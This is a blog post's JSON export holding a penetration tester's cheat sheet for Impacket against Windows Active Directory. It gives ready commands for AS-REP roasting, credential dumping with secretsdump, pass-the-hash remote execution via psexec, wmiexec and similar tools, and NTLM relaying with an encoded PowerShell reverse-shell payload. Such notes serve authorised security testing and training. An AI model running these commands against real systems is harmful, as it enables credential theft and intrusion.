{"id":1222,"date":"2020-04-16T10:50:52","date_gmt":"2020-04-16T08:50:52","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1222"},"modified":"2024-09-08T15:24:51","modified_gmt":"2024-09-08T13:24:51","slug":"impacket","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1222","title":{"rendered":"Impacket"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.coresecurity.com\/corelabs-research\/open-source-tools\/impacket\">See the Impack\u00adet site for a short descrip\u00adtion of all&nbsp;tools.<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Tip: On Kali, use the com\u00admand impacket-*<\/strong><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Enumeration without authentication<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Deter\u00admine the sys\u00adtem architecture<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">getArch.py -target $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Returns the lis\u00adten\u00ading <span class=\"caps\">RPC<\/span> inter\u00adface&nbsp;IDs.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ifmap.py $target 135<br>rpcdump.py $target<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Enumeration with half authentication<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario: You have cre\u00adden\u00adtials for one <span class=\"caps\">AD<\/span> user. Then, try to get all users for which Ker\u00adberos preau\u00adthen\u00adti\u00adca\u00adtion is dis\u00adabled. From Kali, use this com\u00admand with the one valid cre\u00adden\u00adtials you have from&nbsp;peter:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">impacket-GetNPUsers -dc-ip $ip  -request dom.ain\/peter<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If you get hash: <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=391\" data-type=\"post\" data-id=\"391\">Hash\u00adcat<\/a> and mode <em>18200<\/em>.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Enumeration with authentication<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Find (oth\u00ader)&nbsp;users<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">lookupsid.py dom\/user:pass@$target<br>samrdump.py dom\/user:pass@$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get\u00adting as much cre\u00adden\u00adtials as possible<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">secretsdump.py dom\/user:pass@$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get <span class=\"caps\">AD<\/span>&nbsp;users<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">GetADUsers.py -dc-ip $target dom\/user:pass<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Deter\u00admine if a user exists<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rdp_check.py dom\/user:pass@$target<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">rdp_check.py -hashes b40c7060e1bf68227131564a1bf33d48:b40c7060e1bf68227131564a1bf33d48 svcorp.com\/nicky@$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">List run\u00adning process\u00ades (see help, more options are pos\u00adsi\u00adble&nbsp;here)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">services.py dom\/user:pass@$target list<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Code exe\u00adcu\u00adtion<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">atexec.py dom\/user:pass@$target systeminfo<br>psexec.py dom\/user:pass@$target systeminfo<br>impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Shell like Win\u00adRM, but with dif\u00adfer\u00adent end\u00adpoints; could work even when Win\u00adRM is not activated.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">dcomexec.py dom\/user:pass@$target dir<br>smbexec.py dom\/user:pass@$target<br>wmiexec.py dom\/user:pass@$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">(See pth-winexe here as&nbsp;well!)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Track\u00ading ses\u00adsions. This script will remain open and show when ses\u00adsions are cre\u00adat\u00aded or closed.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netview.py dom\/user:pass -target $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Brows\u00ading through <span class=\"caps\">SMB<\/span>&nbsp;share<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">smbclient.py dom\/user:pass@$target<br>smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:6b0e72ee64ea42ca092bd1a7449fa46e Administrator@10.11.1.223<br>smbclient '\\\\$target\\share' -U user%$HASH --pw-nt-hash<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Read\u00ading and manip\u00adu\u00adlat\u00ading the registry<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">reg.py dom\/user:pass@$target query -keyName HKLM\\\\Software\\\\<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Relaying NTLMv2 authentication<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>If you con\u00adtrol a user and want to use its cre\u00adden\u00adtials to authen\u00adti\u00adcate against anoth\u00ader system:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Set up a ntlm\u00adre\u00adlayx with a code to exe\u00adcute on your own sys\u00adtem:<br><code>impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c \"powershell -enc JABjA\u2026\"<\/code><br>The <code>-enc<\/code> part is base64 encod\u00aded Pow\u00ader\u00adShell code; e.g. a reverse shell&nbsp;code.<\/li>\n\n\n\n<li>Start a lis\u00adten\u00ader (defined in the \u2011enc&nbsp;part)<\/li>\n\n\n\n<li>Con\u00adnect from the vic\u00adtim via smb, e.g.\n<ul class=\"wp-block-list\">\n<li>In the Win\u00addows explorer,<\/li>\n\n\n\n<li>via the com\u00admand line <code>dir \\\\$ownSystem\\nonexistingShare<\/code> or<\/li>\n\n\n\n<li>via Pow\u00ader\u00adShell <code>Get-ChildItem \\$ownSystem\\<\/code>nonex\u00adist\u00ading\u00adShare<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">See <a href=\"https:\/\/www.secureauth.com\/blog\/playing-relayed-credentials\">https:\/\/www.secureauth.com\/blog\/playing-relayed-credentials<\/a> for ntlmrelayx.py.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>See the Impack\u00adet site for a short descrip\u00adtion of all&nbsp;tools. Tip: On Kali, use the com\u00admand impack\u00adet-* Enu\u00admer\u00ada\u00adtion with\u00adout authen\u00adti\u00adca\u00adtion Deter\u00admine the sys\u00adtem archi\u00adtec\u00adture getArch.py \u2011tar\u00adget $tar\u00adget Returns the lis\u00adten\u00ading <span class=\"caps\">RPC<\/span> inter\u00adface&nbsp;IDs. ifmap.py $tar\u00adget 135rpcdump.py $tar\u00adget Enu\u00admer\u00ada\u00adtion with half authen\u00adti\u00adca\u00adtion Sce\u00adnario: You have cre\u00adden\u00adtials for one <span class=\"caps\">AD<\/span> user. Then, try to get all users&nbsp;for&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,471],"tags":[50,251],"class_list":["post-1222","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-privesc","tag-enumeration","tag-impacket"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1222","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1222"}],"version-history":[{"count":19,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1222\/revisions"}],"predecessor-version":[{"id":4317,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1222\/revisions\/4317"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1222"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1222"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1222"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}